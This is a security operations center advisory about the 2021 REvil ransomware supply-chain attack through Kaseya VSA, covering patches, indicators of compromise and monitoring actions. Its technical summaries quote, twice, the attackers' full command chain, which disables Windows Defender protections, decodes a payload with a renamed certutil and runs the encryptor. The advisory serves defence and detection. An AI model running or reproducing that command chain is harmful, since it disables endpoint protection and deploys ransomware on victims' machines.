SOC Advisory ***REvil Ransomware Executes Supply Chain Attack via Malicious Kaseya Update v2***
Incident Report for CyFlare
Resolved
This incident has been resolved.
Posted Jul 14, 2021 - 13:36 EDT
Monitoring
REvil Ransomware Executes Supply Chain Attack via Malicious Kaseya Update v2

Posted Date: 07/12/2021

Published Date: 07/12/2021

Source: Kaseya

Sector: Information Technology & Information Security

DATE(S) ISSUED: 07/02/2021

UPDATED: 07/12/2021

SUBJECT: Supply Chain Attack – Malicious Kaseya Update Executing Malware by REvil Group

UPDATED OVERVIEW – 07/12/2021:

Kaseya has now successfully developed a patch for VSA servers on Sunday 07/11/2021. Below are the latest communications from Kaseya. These communications can also be found using the link in the references below.

You can install the patch with the "KInstall.exe" update utility, found online here if you do not find a local copy. Installing the patch does suggest a Windows Update if you have not recently installed the latest updates from Microsoft.

From our testing, installing the patch took approximately 10 minutes. After logging back in to the VSA service, you are prompted to change your password to meet the new policy requirements. With this patch installed, we believe the attack vector is no longer present.

Also note as previously communicated, spammers are using the news about the Kaseya Incident to send out fake email notifications that appear to be Kaseya updates. These are phishing emails that may contain malicious links and/or attachments.

Do not click on any links or download any attachments in emails claiming to be a Kaseya advisory. Moving forward, all new Kaseya email updates will not contain any links or attachments.

VSA Update – 07/12/2021 8:00 AM EST:

As posted in the previous update we released the patch to VSA On-Premises customers and began deploying to our VSA SaaS Infrastructure prior to the 4:00 PM target. The restoration of services is now complete, with 100% of our SaaS customers live as of 3:30 AM US EDT. Our support teams continue to work with VSA On-Premises customers who have requested assistance with the patch. We will continue to post updates as new information becomes available.

VSA Update – 07/11/2021 4:30 EST:

VSA SaaS and On-Premises Release Notes have now been published and are available at: https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041

VSA SaaS:
The restoration of our VSA SaaS Infrastructure has begun. We will send email notifications as the individual instances come back online over the next several hours.
Please review:
VSA SaaS Startup Runbook – https://helpdesk.kaseya.com/hc/en-gb/articles/4403709476369
VSA SaaS Hardening and Best Practice Guide – https://helpdesk.kaseya.com/hc/en-gb/articles/4403622421009-VSA-SaaS-Best-Practices

VSA On-Premises

The VSA On-Premises patch is now available. You can run KINSTALL as you normally do as part of your patching process.
Please review:
On Premises Startup Runbook (Updated July 11th – Updated Step 4) – https://helpdesk.kaseya.com/hc/en-gb/articles/4403709150993incident-response

VSA On-Premise Hardening and Practice Guide – https://helpdesk.kaseya.com/hc/en-gb/articles/4403760102417
Status updates from Kaseya can be found using the link as follows: https://www.kaseya.com/potential-attack-on-kaseya-vsa/?mkt_tok=OTM0LVhRQi01NjgAAAF-HMaXjyYKZpB4GMeVb1FvPQDEnE70x5s52h7OuAe962wcTuGkhfkUiJ-WlChAElUhRJKtHpfaFOyL4UyqIYOuNGXR5Qed0pzuVeLikGEHBvtI4LVb

OVERVIEW:

“The REvil ransomware gang appears to have gained access to the infrastructure of Kaseya, a provider of remote management solutions, and is using a malicious update for the VSA software to deploy ransomware to companies across the world.

The incident first came to light earlier today in a Reddit section dedicated to managed service providers (MSPs), companies that provide remote IT services to smaller businesses lacking an IT department and which are usually Kaseya’s primary customers.

MSPs use Kaseya’s VSA platform to manage and deploy software updates to customer networks or access remote systems to troubleshoot a customer’s IT problems; however, this very same functionality can be abused by threat actors who manage to gain access to an MSP’s VSA platform.

References:
https://www.msspalert.com/cybersecurity-breaches-and-attacks/kaseya-rmm-cyberattack-warning/
https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/
https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/
https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689
https://www.sentinelone.com/blog/revils-grand-coup-abusing-kaseya-managed-services-software-for-massive-profits/
https://news.sophos.com/en-us/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack/
https://www.kaseya.com/potential-attack-on-kaseya-vsa/?mkt_tok=OTM0LVhRQi01NjgAAAF-HMaXjyYKZpB4GMeVb1FvPQDEnE70x5s52h7OuAe962wcTuGkhfkUiJ-WlChAElUhRJKtHpfaFOyL4UyqIYOuNGXR5Qed0pzuVeLikGEHBvtI4LVb
https://www.cadosecurity.com/post/resources-for-dfir-professionals-responding-to-the-revil-ransomware-kaseya-supply-chain-attack
https://otx.alienvault.com/pulse/60e02f9e498dfdf25caf7753

UPDATED THREAT INTELLIGENCE - 07/07/2021:

All on-premises VSA Servers should continue to remain offline until further instructions from Kaseya about when it is safe to restore operations. A patch will be required to be installed prior to restarting the VSA and a set of recommendations on how to increase your security posture.
On Monday, July 5, Kaseya announced they are developing a new patch for on-premise installations in order to assist customers in getting back to service. Kaseya also published a Compromise Detection Tool for customers to check if their on-premise installation had been actually compromised.

Since this outbreak, attackers have been scanning for Kaseya on-premise internet exposed servers using publicly available platforms such as Shodan.io. This time window allows attack groups besides REvil to obtain immediate access over the internet to customer-sensitive networks.
At this point, this appears to be the largest mass-scale ransomware incident to date. In an unexpected twist, the attackers are offering a universal decryption tool for all victims at a lump sum of $50 million (originally $70 million).

THREAT INTELLIGENCE:

“We are tracking 8 MSPs where this has happened and working in close collaboration with two of them. Although all four are running Kaseya VSA, we have not validated that VSA is being exploited (not fair at this time to say, "Kaseya has been hacked" without evidence.”

Kaseya's official recommendation is to: "IMMEDIATELY shutdown your local VSA server until you receive further notice from us.

We are experiencing a potential attack against the VSA that has been limited to a small number of on-premise customers only as of 2:00 PM EDT today. We are in the process of investigating the root cause of the incident with an abundance of caution, but we recommend that you IMMEDIATELY shutdown your VSA server until you receive further notice from us. It’s critical that you do this immediately, because one of the first things the attacker does is shutoff administrative access to the VSA.”

SYSTEMS AFFECTED: Kaseya VSA Servers - Windows

RISK:

Managed Service Providers (MSPs) or companies that provide remote IT services to other companies or access to remote systems are affected by this threat. Kaseya VSA is also used by regular businesses that are sized medium and large. Meaning this attack is not limited to MSPs only, but non-MSP entities as well.

UPDATED TECHNICAL SUMMARY - 07/07/2021:

On July 2 around 10:30 ET many Kaseya VSA servers were exploited and used to deploy ransomware. Here are the details of the server-side intrusion:

Attackers uploaded agent.crt and Screenshot.jpg to exploited VSA servers and this activity can be found in KUpload.log (which *may* be wiped by the attackers or encrypted by ransomware if a VSA agent was also installed on the VSA server).
A series of GET and POST requests using curl can be found within the KaseyaEdgeServices logs located in %ProgramData%\Kaseya\Log\KaseyaEdgeServices directory with a file name following this modified ISO8601 naming scheme KaseyaEdgeServices-YYYY-MM-DDTHH-MM-SSZ.log.

Attackers came from the following IP addresses using the user agent curl/7.69.1:18.223.199[.]234 (Amazon Web Services) discovered by Huntress161.35.239[.]148 (Digital Ocean) discovered by TrueSec35.226.94[.]113 (Google Cloud) discovered by Kaseya162.253.124[.]162 (Sapioterra) discovered by KaseyaWe've been in contact with the internal hunt teams at AWS and Digital Ocean and have passed information to the FBI Dallas office and relevant intelligence community agencies.

The VSA procedure used to deploy the encryptor was named "Kaseya VSA Agent Hot-fix”. An additional procedure named "Archive and Purge Logs" was run to clean up after themselves

The "Kaseya VSA Agent Hot-fix” procedure ran the following: "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Endpoint Indicators of Compromise

Ransomware encryptors pushed via the Kaseya VSA agent were dropped in TempPath with the file name agent.crt and decoded to agent.exe. TempPath resolves to c:\kworking\agent.exe by default and is configurable within HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Kaseya\Agent\

When agent.exe runs, the legitimate Windows Defender executable MsMpEng.exe and the encryptor payload mpsvc.dll are dropped into the hardcoded path "c:\Windows" to perform DLL sideloading.

The mpsvc.dll Sodinokibi DLL creates the registry key HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter which contains several registry values that store encryptor runtime keys/configurations artifacts.

• agent.crt - MD5: 939aae3cc456de8964cb182c75a5f8cc - Encoded malicious content
• agent.exe - MD5: 561cffbaba71a6e8cc1cdceda990ead4 - Decoded contents of agent.crt
• cert.exe - MD5: - Legitimate Windows certutil.exe utility
• mpsvc.dll - MD5: a47cf00aedf769d60d58bfe00c0b5421- REvil encryptor payload

Mitre TTPs Used in Kaseya Attack

• T1112 – Modify Registry
• T1012 – Query Registry
• T1082 – System Information Discovery
• T1120 – Peripheral Device Discovery
• T1491 – Defacement
• T1543.003 – Create or Modify System Process: Windows Service
• T1036 – Masquerading
• T1036.003 – Masquerading: Rename System Utilities
• T1202 – Indirect Command Execution
• T1486 – Data Encrypted for Impact
• T1106 – Native API


TECHNICAL SUMMARY:

Here's validated indicators of compromise known at this time:

Ransomware encryptor is dropped to c:\kworking\agent.exe

The VSA procedure is named "Kaseya VSA Agent Hot-fix”

At least two tasks run the following:
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y
C:\Windows\System32\certutil.exe
C:\Windows\cert.exe & echo %RANDOM% >>
C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Other possible Indicators of Compromise (IOCs) identified:

VirusTotal

MD5
561cffbaba71a6e8cc1cdceda990ead4
SHA-1
5162f14d75e96edb914d1756349d6e11583db0b0
SHA-256
d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

Vhash
095056655d15656az47!z

Authentihash
c9d30e7bf92c0bb67331c3526580a45d8446c785e4c671f55c957f53b285158f

Imphash
59349b1648eddf021c01f05a17a0e870
Rich PE header hash
60c050aad9e163c9893ac438cc74b2bf

SSDEEP
24576:vMz7ETDWX4XukZeVL/kYx9P/JY6gfjcsAE:kfF7k4pB/JYPIsAE

TLSH
T1D915BF03F6C199B2F5DF013960B2577E8D3AAE158729D9D39B9038668D312D06B3F389
File type
Win32 EXE
Magic
PE32 executable for MS Windows (GUI) Intel 80386 32-bit

TrID
Windows Control Panel Item (generic) (88.3%)

TrID
Win64 Executable (generic) (4.7%)

TrID
Win16 NE executable (generic) (2.2%)

TrID
Win32 Executable (generic) (2%)

TrID
OS/2 Executable (generic) (0.9%)
File size
890.88 KB (912264 bytes)

UPDATED ACTIONS TAKEN - 07/12/2021:

The CyFlare SOC is still actively monitoring for indicators of compromise related to the Kaseya supply chain attack. The updated actions taken are as follows:

• Worked with our security tool vendors such as Stellar Cyber-BDS, SentinelOne, Sophos, and Tenable to have the IOCs identified from the attack productized into new security detections.
o The detection for this activity “Emerging Threat Detection” is now active for BDS. If it’s triggered in your environment, then the SOC will immediately escalate.
o Confirmed there are AlienVault OTX Pulses for detecting this activity and triggering security detections if observed. Reference Link: https://otx.alienvault.com/pulse/60e02f9e498dfdf25caf7753
o SentinelOne has also confirmed that this threat is detected and mitigated by SentinelOne. Reference Link: https://www.sentinelone.com/blog/revils-grand-coup-abusing-kaseya-managed-services-software-for-massive-profits/
o Sophos has published a query to check for matching IOCs present on endpoints. Reference Link: https://news.sophos.com/en-us/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack/
o Tenable has released a local Windows detection for Kaseya agents as well as a remote detection plugin for Kaseya VSA to help you identify potentially vulnerable systems. When patches are available, we will also provide a version check plugin.
• We have been continuously searching for any suspicious artifacts observed within affected customer’s environments since this threat has emerged.
• As of today July 12th, using updated artifacts we can confirm we still have not observed any indicators of compromise among all of our clients related to this emerging threat.
• Please continue to ensure local VSA servers are shut off until further notice from Kaseya. SaaS offerings of VSA are all still shutdown by Kaseya (No SaaS VSA services online) until further notice and a patch is developed.

ACTIONS TAKEN:

The CyFlare SOC is closely monitoring the situation as updates continue to arise from Kaseya and the public. We also have word from one of our affected customers that Kaseya, as a precaution, shut down the entire SaaS architecture so they can examine everyone’s instances to be sure this is isolated to on-prem folks.

At this time, we do not believe any of our customers utilizing Kaseya are compromised at this time. This conclusion is the result of threat hunting searches performed looking for the indicators of compromise listed above into each affected customer’s environment/security solutions CyFlare manages.

For our managed endpoint or SentinelOne MDR customers, we have also implemented a global blacklist on one key IOC identified. We added the SHA1 Hash identified as the Kaseya VSA Ransomware Encryptor Hash to the blacklist.

As more details for this emerging threat arise through the Cyber community or through Kaseya notices, your SOC will continue to address. If there any further updates, or indication that one of our affected customers are compromise then we will engage you further immediately.

If you have any further questions, comments, or concerns regarding this threat then please do not hesitate in contacting your SOC at CyFlare. The SOC can be reached via email, ticket, or phone call to our support center.

Thank you for your cooperation
Posted Jul 12, 2021 - 14:43 EDT
This incident affected: Breach Detection Service.